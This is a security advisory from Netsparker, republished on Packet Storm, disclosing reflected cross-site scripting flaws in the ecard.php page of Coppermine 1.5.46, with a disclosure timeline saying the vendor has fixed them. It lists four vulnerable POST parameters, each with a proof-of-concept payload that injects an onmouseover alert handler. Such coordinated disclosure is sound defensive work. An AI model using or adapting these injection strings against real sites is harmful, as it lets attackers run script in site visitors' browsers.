what you don't know can hurt you

Coppermine 1.5.46 Cross Site Scripting

Coppermine 1.5.46 Cross Site Scripting
Posted Jan 23, 2019
Authored by Zekvan Arslan | Site netsparker.com

Coppermine version 1.5.46 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-14478
MD5 | d37f4a5ba2e5df45b19a516b5b451cff

Coppermine 1.5.46 Cross Site Scripting

Change Mirror Download
Multiple Reflected Cross-site Scripting Vulnerabilities in Coppermine 1.5.46

Information
--------------------

Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting in Coppermine 1.5.46
Affected Software: Coppermine
Affected Versions: 1.5.46
Homepage: http://coppermine-gallery.net/
Vulnerability: Reflected Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: 2018-14478
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-18-050

Technical Details
--------------------

URL: /ecard.php?album=1&pid=1
Parameter Name : sender_name
Parameter Type : Post
Attack Patern : x" onmouseover=alert(0x01B2D5) x="

URL : /ecard.php?album=1&pid=1
Parameter Name : recipient_email
Parameter Type : POST
Attack Patern : x" onmouseover=alert(0x01B2DD) x="

URL : /ecard.php?album=1&pid=1
Parameter Name : greetings
Parameter Type : POST
Attack Patern : x" onmouseover=alert(0x01B2E3) x="

URL : /ecard.php?album=1&pid=1
Parameter Name : recipient_name
Parameter Type : POST
Attack Patern : x" onmouseover=alert(0x01B2D9) x="

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

12th November 2018 - First Contact
21th December 2018 - Vendor Fixed
23th January 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close